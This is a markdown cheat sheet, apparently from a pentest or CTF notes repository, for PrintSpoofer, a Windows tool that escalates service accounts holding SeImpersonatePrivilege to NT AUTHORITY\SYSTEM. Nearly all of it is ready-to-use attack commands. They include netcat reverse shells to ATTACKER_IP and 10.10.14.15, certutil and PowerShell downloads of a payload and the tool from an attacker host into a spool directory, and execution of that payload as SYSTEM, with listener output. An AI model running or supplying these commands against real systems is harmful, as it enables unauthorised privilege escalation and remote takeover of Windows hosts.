Skip to content

Latest commit

 

History

History
60 lines (41 loc) · 1.82 KB

File metadata and controls

60 lines (41 loc) · 1.82 KB

PrintSpoofer

PrintSpoofer exploits SeImpersonatePrivilege to escalate from service accounts to NT AUTHORITY\SYSTEM on Windows Server 2016, Server 2019, and Windows 10.

Requirements

  • Service account with SeImpersonatePrivilege (e.g., IIS AppPool, SQL Server, DNN application pool)

Usage

# Spawn interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd

# Using PrintSpoofer64 with a reverse shell
PrintSpoofer64.exe -c "c:\path\to\nc.exe ATTACKER_IP PORT -e cmd"

Example: DNN App Pool to SYSTEM

# Confirm privileges
whoami /priv
# Look for: SeImpersonatePrivilege Enabled

# Upload PrintSpoofer64.exe and nc.exe to writable directory
# Execute reverse shell as SYSTEM
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.14.15 443 -e cmd"

# On attack host, catch shell
nc -lvnp 443
# whoami → nt authority\system

Example: Local Service to SYSTEM

If a webshell runs as nt authority\local service and has SeImpersonatePrivilege, upload a reverse shell and PrintSpoofer64.exe to a writable directory such as C:\Windows\System32\spool\drivers\color.

whoami /all
:: SeImpersonatePrivilege        Impersonate a client after authentication Enabled

certutil -urlcache -f http://ATTACKER_IP:8000/shell.exe C:\Windows\System32\spool\drivers\color\shell.exe
powershell -c "iwr -uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -outfile C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe"

C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe -c "C:\Windows\System32\spool\drivers\color\shell.exe"

On the listener:

connect to [ATTACKER_IP] from TARGET
C:\Windows\system32>whoami
nt authority\system

Links